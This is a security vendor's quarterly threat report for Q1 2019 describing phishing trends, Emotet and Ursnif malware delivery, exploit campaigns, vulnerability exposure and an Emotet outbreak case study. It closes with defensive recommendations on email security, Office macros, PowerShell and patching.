The Q1 2019 Quarterly Threat Report provides a snapshot of threat events and trends investigated by the eSentire Security Operations Center (SOC) in January, February and March of 2019.
Read on this article to learn what attacks are targeting mid-sized organizations and what strategies you can implement to protect your business.
Hostile Internet Background Radiation
Remote Exploit Campaigns
Anatomy of an Emotet Outbreak
Sandbox Samples Observed
Industry View: Distributed Networks
Takeaways and Recommendations
Malicious Documents (Malware)
eSentire Managed Detection and Response (MDR) is an all-encompassing cybersecurity service that detects and responds to cyberattacks. Using signature, behavioral and anomaly detection capabilities, plus forensic investigation tools and threat intelligence, our Security Operations Center (SOC) analysts hunt, investigate and respond to known and unknown cyberthreats in real-time, 24x7x365.
This report provides a snapshot of events investigated by the eSentire SOC in Q1 2019. It provides visual and data analysis, written analytical analysis, practical recommendations and key assumptions for readers seeking to understand and better respond to the cybersecurity threat landscape.
eSentire’s Threat Intelligence team observed a significant reduction in hostile traffic on the eSentire threat detection surface in the first quarter of 2019 (Figure 1) including malware, phishing and remote exploit attempts (abbreviated exploits). Leading this contraction was a drop in opportunistic campaigns targeting Microsoft IIS, ThinkPHP, GPON and D-Link. And, the fact that fewer phishing incidents were also observed is potentially a result of cybercriminals pivoting to secure communications (HTTPS) for phishing operations. Some detection technologies depend on the assumption that legitimate services (e.g., Google, Dropbox) do not serve login pages over HTTP, but threat actors running phishing sites do. So as the security community shifts to new behavioral detection, a smaller subset of signature-based detection is available, which could contribute to decreased detections.
In addition, a reduction in observed malware incidents was influenced by a decline in coinimining and Kovter. On the other hand, malicious documents (MalDocs) were on the rise through Q1 2019 after a brief hiatus in observation that occurred in late December and early January.
Delivery via MalDocs remains the number one observed malware threat to all industries (Figure 2, left). Despite overall abatement in volumes in Q1 2019 vs. Q4 2018, coinmining still had a significant presence in the mining industry during Q1 (Figure 2, right). However, observed incidents were limited to guest networks that had little impact on the ability for these organizations to function. Construction, healthcare and manufacturing all face numerous challenges to maintain a secure environment given the mobile and remote nature of construction, the information-sharing requirements for healthcare, and the unique infrastructure required for manufacturing. Mining operations (not to be confused with coin-mining) often have remote sites with guest networks for use by employees off hours, which is a primary source of observations of malware within the mining industry.
Phishing incidents across eSentire’s customer base were observed mostly in the construction industry in the form of bank payment lures (Figure 3). Technology, healthcare and mining were also susceptible to phishing, despite fewer incidents in the first quarter. Lures fashioned after Interac, a Canadian bank payment system, were only found in Canadian organizations, while AppleID focused lures were observed across many countries and industries. Facebook, Microsoft and webmail lures (typically login prompts for Outlook, Gmail and Office 365), also were observed in higher volumes compared to other lures.
Most phishing occurred midweek, which is consistent with previous observations (Figure 4). An interesting new 2019 trend is a shift to Thursday as the least successful workday for phishing. Weekend contributions come from the healthcare, construction and mining industries which tend to have active employees during the weekend due to the nature of their business operations.
One potential consideration for phishing susceptibility midweek is that closer to the weekend employees are in transition and may be more alert or less willing to engage in unfamiliar requests. Contrast this with midweek when employees may be operating in a more automated fashion. If a reporting process is in place when experienced and resilient employees are among the first to receive a phishing email, proper reporting and mitigations (such as blocking the malicious domain) will reduce the chances of other employees falling victim.
When conducting phishing exercises on employees, it is recommended that companies chose a day when employees are most vulnerable to ensure that susceptible employees are identified to correct their behavior. While resilient employees can be helpful in real phishing incidents, they also skew the measurement of employee susceptibility during internal resilience sabotage tests. To overcome this, employers should test different employees at different times with different lures.
Hostile Internet Background Radiation
Remote exploit attempts are largely unsuccessful in corporate environments but can give an idea of an organization’s external exposure. The biotechnology, accounting and education verticals appeared to have the greatest exposure to opportunistic threats in Q1 2019. (Figure 1, bottom right). In some cases, the exposure is necessary, as with public- facing websites. Even when appropriately segmented, businesses may want to monitor them for compromise as any incident has the potential to cause brand damage when not addressed in a timely fashion.
As the vulnerability section below emphasizes, patching can be overwhelming and without a way to identify and prioritize important patches, these largely unsuccessful attacks can become successful. External facing services with known vulnerabilities are a priority for patching, but eSentire’s Security Operation Center (SOC) has observed accidental exposure of internal systems that have been left unpatched. Because of the volume and variety of automated remote exploits occurring in the internet background radiation, accidental exposure of vulnerable assets can quickly lead to compromise. It is recommended that organizations employ robust policies and procedures around network changes and consider services which monitor their external infrastructure. When these preventative controls fail, it is critical that organizations react quickly to identify and address risk associated with misconfigurations and other errors.
Remote Exploit Campaigns
Many web server exploits that persisted throughout the majority of 2018 appeared to diminish in February 2019 (Figure 5). Only Microsoft IIS and ThinkPHP were observed in large volumes during Q1 2019. Exploit attempts on web server and campaigns against home routers decreased in February with some occasional observations of exploits targeting GPON and Shuttletech brands. Updates to detection methodology in March grouped some of this activity under the Mirai user agent category (Figure 5, bottom, red) which is consistent with the associated injection techniques observed by eSentire in the prior rule set. Thus, Mirai user agent does not represent a previously unseen attack, it merely classifies known botnets on user agent instead of packet content.
Across clients, vulnerabilities in Microsoft IIS, WebLogic, PHP-coded webpages and the SNMP protocol were observed. In one case, eSentire investigated artifacts from the successful exploitation of an outdated Drupal web server. An investigation by eSentire revealed various webshells, a filedropper and a backdoor Drupal account that had been dropped following successful exploitation of a known Drupal vulnerability. Given the volume of opportunistic exploits and the rapidly expanding threat surface of more tech solutions, organizations cannot be complacent when addressing present vulnerabilities. Monitoring for indicators of compromise post-exploitation is just one feature of robust vulnerability management.
On average, high and critical severity vulnerabilities existed in about eight percent of externally facing assets across the eSentire Managed Vulnerability Service customer base, with insurance, technology and finance being the most exposed (Figure 6). Outside of the previously discussed Drupal case, eSentire did not observe the successful exploitation of externally facing assets in Q1. The nature and diversity of vulnerabilities varied from industry to industry. For example, technology, finance, business services and healthcare all require a large diversity of services running in their environments. Insurance companies had less diversity in their vulnerabilities. Many vulnerabilities may have mitigations in place that could not be captured in this data.
Analysis of the average weaponization time—the the time between the discovery of a vulnerability and the publishing of a related exploit—results in an exponentially decreasing curve, while confirmed exploitable vulnerabilities grew (Figure 7). Exploit publish dates are limited to those reported by exlpoit-db. Further, there is decline in the average measure when multiple exploits have been published for a single vulnerability or a vulnerability is discovered which happens to already have an exploit.
Available vulnerability data shows the count of distinct products with reported vulnerabilities increased by 150 percent between 2015 and 2019. Additionally, the number of individuals or organizations focused on vulnerability research has increased (likely motivated by monetary rewards via bug bounty programs). For example, Google’s Security Research team dominates this data set. In 2018, the Zero Day Initiative reported a record number of vulnerability advisories. Therefore, while the diversity of available products has increased, so has the number of individuals and organizations focused on discovering and reporting vulnerabilities in a responsible manner. While this suggests applications are better secured, the scrutiny from researchers occurs most often after a product is deployed. Thus, the discovery and remediation of vulnerabilities remain a core aspect of good risk management.
Organizations should also be aware of gaps that may not be addressed by regular patching policies. These gaps can arise when researchers become frustrated with vendor responsiveness and publish their research independently of the vendor. A notable example occurred last year when a researcher disclosed a Windows 0-day. In Q1 2019, research and proof-of-concept code for a serious NTLM relay vulnerability in Exchange were published. It took several weeks before official guidance or security updates were released by Microsoft.
Gaps also can arise when serious vulnerabilities are identified in applications or products outside the normal patching scope. An example of this occurred in February with the popular freeware archive tool WinRAR. The vulnerability was disclosed along with proof of concept code and was observed being exploited in the wild just five days after publication. Limiting or restricting unauthorized applications can significantly reduce this risk but may not be feasible due to overhead costs or employee resistance. For example, eSentire found WinRAR present on 40 percent of endpoint customers, suggesting strict application policies are not adopted across the board. Organizations can compensate for this by maintaining an inventory of installed applications or the ability to rapidly retrieve this information from endpoints as needed. Monitoring public sources (such as technical blogs and social media) for relevant information is critical for maintaining a minimal threat surface. There should also be a policy in place for prioritizing and addressing ad-hoc updates when these sources yield actionable information.
Following past trends, Emotet remains the most observed malware threat, followed by Ursnif (Figure 8). Both arrive in malicious documents that rely on victim interaction and abuse built-in features such as Windows PowerShell and Microsoft Office macros. Emotet infections have also been known to spread using mail and SMB via administrative shares or the EternalBlue exploit. Because Emotet is a delivery malware, it is often observed as a precursor to financially motivated malware, such as ransomware and banking trojans [emopayload]. In one incident in February 2019, eSentire observed Emotet preceding installation of the Trickbot banking trojan. eSentire also observed the use of Mimikatz, which is used for penetration testing and malicious activity.
Vagueware is malware that is either poorly classified or not classified at all by antivirus vendors and can sometimes include potentially unwanted programs (PUPs) and adware. Confirmed PUPs and adware are removed from the dataset.
During the first three months of 2019, eSentire observed malicious documents leveraging PowerShell to download and execute malware. PowerShell was a commonly observed execution technique across various malware incidents in Q1, particularly with regards to Emotet and Ursnif. This is a continuation of the trend reported in eSentire’s 2018 Annual Threat Report. Obfuscation for Emotet and Ursnif occurs at the command line level when PowerShell is invoked to download and execute the target payload. Input to the command line is obfuscated using string operations that the Windows command line accepts. Obfuscation methods have become increasingly complex (see APPENDIX A). As PowerShell comes under increased scrutiny, threat actors have increased obfuscation complexity in order to evade detection and impeded analysis. Technical controls on PowerShell can reduce the risk of infection (see Recommendations). A handful of other execution techniques were observed (Figure 10). Most abuse Windows services and powerful administrative tools like PowerShell.
Numerous adware and PUP signatures also were detected. While these applications can indicate a certain level of risk in an organization, they are considered consensual as they are typically the consequence of free internet services. Adware and PUP signatures are therefore removed for threat data analysis.
A decrease in malware in the first quarter of 2019 corresponded with a lack of detections associated with malicious documents in January, as well as an overall decline in observed coin-miners (Figure 11). Some detection was generic (MalDoc) while some were able to identify the strain of malicious document used (Emotet and Ursnif). Detection patterns for malicious documents coincided with Christmas and Russian Orthodox holidays, as observed by Cisco and Cofense. A smaller gap in observed malware occurred around Thanksgiving 2018. The lack of detections during holidays is not surprising, given that employees are less likely to be around to open malicious documents. In addition to this, it is generally accepted that Emotet campaigns are run by operators who have a vacation schedule of their own.
While Emotet seemed to have a topical correlation with vacations, coinmining incidents occurred more consistently. This trend follows a peak in coinmining detections from Q4 2018. In the first quarter, the rate of coinmining incidents slowed down significantly. Coinmining observations originate from a different cultural context than Emotet. In the vast majority of cases, devices were traced to guest networks, implying they were privately owned. Interestingly, coinmining observations were absent during Thanksgiving break, but not Christmas. Most coin-mining incidents occur in non-English speaking countries, making speculation about holidays more nuanced.
Anatomy of an Emotet Outbreak
In one incident observed by eSentire Threat Intelligence, an Emotet infection was able to spread laterally across the network. In addition to endpoint monitoring, the organization had an antivirus solution in place. However, due to Emotet’s rapid evolution and polymorphic capabilities, the antivirus solution was unable to prevent the malware’s spread throughout the network.
The incident involved a network in which several hosts were out of scope for endpoint monitoring by eSentire. Over a 12-hour period, the out-of-scope machines periodically returned to infect machines in scope, allowing some insight into how Emotet spreads internally. At ground zero, the outbreak was observed spreading to eight hosts from a single source (Figure 12, blue). A few hours later, another source was observed infecting four more machines with a different Emotet payload (Figure 12, grey) followed by the original source reinfecting the same four with the new payload. Several hours later, a third payload was observed spreading to 24 hosts (Figure 12, red).
After collecting all discoverable telemetry, it was discovered more machines were infected. Twelve in the first cluster, seven in the second cluster and 25 in the final cluster. In total, nearly 40 infected machines were observed within, or peripheral to endpoint scope by the end of the 12-hour period. The customer was informed of the systems outside of eSentire’s monitoring scope and actions were taken to remediate and harden the network against future attacks.
For the incident at hand, a lateral outbreak occurred five times in three distinct clusters (Figure 13). For a given cluster, the spread across hosts was rapid. For example, in the first cluster at 12:30 a.m., 10 machines were infected within 12 seconds with the first two machines being infected within the first second (Figure 13).
Emotet has previously been reported spreading through SMB, using the EternalBlue exploit and administrative shares. In this incident, the spread was facilitated through administrative shares, using a privileged account or legitimate credentials. Administrative shares are created by default on most Windows machines, including servers. Once an attacker has escalated privilege to an administrative account, they will typically have access to these default administrative shares. Disabling the shares requires modification of the AutoShareWks parameter in Windows registry.
Organizations that employ a single antivirus solution may have detection gaps, particularly with respect to sophisticated malware such as Emotet. A multi-faceted solution that employs a variety of detection schemes is more likely to detect changes in malware signatures and behavior. The more people there are using antivirus engines, the more data is available for crafting robust detection. Integration of results from various antivirus solutions have been loosely implemented, but format standardization and interpretations of results remain a hurdle.
A consistent observation in tracing the taxonomic variations of malware is that quickly evolving strains like Emotet that find ways to bypass individual endpoint solutions are still often caught by other endpoint solutions. For example, an Emotet sample observed in late March 2019 was only detected by six AV engines out of 54 used by VirusTotal, bypassing the other 48 (Figure 14). Nearly 40 hours later, about half of the implemented AV solutions were able to detect the malware. This leaves a significant window for Emotet to infiltrate organizations, bypass AV and carry out financial or data theft crimes. As a caveat, VirusTotal antivirus configurations aren’t necessarily the same as they would be deployed on an endpoint, however eSentire endpoint analysts have observed Emotet bypassing AV in client environments more than once.
Similar to endpoint and network data (Figure 11), we observed a break in Emotet sandbox samples, during the intersection of North American and European holidays (Figure 15). Upon returning, Emotet was not immediately identified by standard solutions, which labeled it with the generic “Xdoc” marker (Figure 16). Some of these samples were identified by the sandbox as Emotet, while others were identified by less standard antivirus solutions. Some antivirus solutions did not appear to detect a threat at all. Determining the veracity of individual classifier results is a research project in itself. A combination of endpoint monitoring and human analysis can facilitate the detection and response to evasive malware.
Sandbox Samples Observed
Of the sandbox samples observed, the majority were classified as malicious documents, but handfuls of ransomware, infostealers and backdoors were also detected (Figure 17). Some of these may have been the payloads associated with malicious documents observed across the eSentire detection surface.
An increase in sandbox submissions in Q4 2018 may appear to conflict with a decrease observed in endpoint, but these are fundamentally different detection streams and, as noted previously, sandbox submissions may also represent verification checks when other technologies have already detected malware. The surge of ‘Xdoc’ submissions in January would support the narrative that detectors were having a hard time automatically determining the nature of Emotet samples, requiring analysts to make heavier use of the sandbox instance to interpret detection results.
Classification of sandbox samples by malware type and intent reveals a similar distribution as observed on endpoint metrics. Unlike endpoint detections, sandbox samples arrive from a client request. Thus, the sandbox serves as an indicator of human detection. However, the sandbox is also used for verification and research. For example, numerous LockerGoga samples were found in the sandbox, but they were all the result of our research interest. The sandbox also is used for the verification of incidents that may have been detected in endpoint or network solutions. Taxonomic relationships are identified in Figure 18.
Industry View: Distributed Networks
Data gathered from esNETWORK clients showed that industries with more distributed organizations tend toward more malware and phishing incidents (Figure 1, construction and healthcare). The result has broader implications beyond network topology to the porousness of the social and physical environment in which these businesses operate. For example, construction organizations are distributed across numerous mobile, remote and shared public sites where construction projects are carried out. In addition to the increased threat surface created by devices, there is likely to also be vulnerabilities in the social structure of these organizations. With teams distributed across different construction sites at different times, the ability to share and reinforce information about phishing incidents and drive-by downloads is diminished. Construction employees spend most of their time with their hands full in a loud, distracting and dangerous environment; it’s unlikely that analysis of email communications is a high priority under such conditions.
Healthcare faces similar problems. While hospitals and clinics may generally reside in a single location, much of the underlying processes in healthcare rely on an open network. Healthcare institutions must share their network with numerous technical service providers, other healthcare providers, technicians and their own patients. As in construction, healthcare employees use their hands and senses in a demanding, high-stress environment, so effects of decision fatigue and constant attention-to-detail in physical space may lead to reduced alertness once employees sit down in front of a computer. In addition to this, the myriad of partners, patients, technicians and healthcare providers make tracking legitimate communications a demanding task.
To address these deficiencies, it is recommended that construction and healthcare organizations engage in ongoing phishing and web-browsing hygiene awareness through training. There should be a process in place for reporting phishing and a way to share out and communicate real examples of common phishing lures in your organization.
Takeaways and Recommendations
Email-Based Attacks (Phishing and Malware)
Email is one of the most common attack vectors observed by eSentire. Reducing this attack surface will protect your organization from phishing and email-borne malware.
- User-awareness training for employees
- Continuous simulated phishing exercises to assess effectiveness
- Share examples of real phishing attempts to target departments in your organization to help employees identify phishing in the future
- Implement a process for reporting and responding to suspicious emails
- Simplify the submission process, e.g., a phishing button
- Identification and removal of malicious emails across employee inboxes:
- Include visibility into instances of end-user URL click-through, program execution and credential submission to facilitate cleanup
- Implement spam filtering
- Implement URL rewrite
- Implement attachment sandboxing
- Only allow email attachments containing trusted file types
- Restrict execution from temp directories, such as AppData
- Implement tagging for external emails
- Enable spoofing protection
- Block or purchase domains similar to your organization’s domain to prevent abuse
Malicious Documents (Malware)
The majority of endpoint infections detected in Q1 2019 leveraged PowerShell and other trusted windows processes for executing code downloaded from the internet. PowerShell is observed being launched from Office documents through CMD.EXE.
- Raise awareness about malicious macros in Office documents. If your organization uses macros legitimately, be sure to present and clarify the different use cases to your employees with examples of both legitimate and malicious documents with macros embedded
- Block macros in Microsoft Office documents that originate from the internet
- Block Office execution from temporary directories such as Outlook and internet browsers
- Set notepad.exe as default program for scripting file types (.js, .jse, .ps, .vba, etc.)
- Reduce attack surface associated with PowerShell:
- For Windows 10, consider implementing attack surface reduction rules
- Block PowerShell via Windows Firewall
- Prevent version downgrade of PowerShell
- Anti-Malware Scan Interface (AMSI)
- Implement PowerShell script-block logging
- Work with your IT or security department to put a regular patching schedule in place
- Consider freeware (such as WinRar and Notepad++) in patching policies
- Have a process in place to monitor security news and vulnerabilities announcements and respond with adhoc patching if needed
- Implement monitoring and detection of asset exposure to external networks
- Consider two-factor authentication for externally-facing remote access points Ensure the default credentials are changed when new technologies are implemented in your environment, especially when those assets are exposed to the internet
eSentire Threat Intelligence used data gathered from over 2,000 proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product.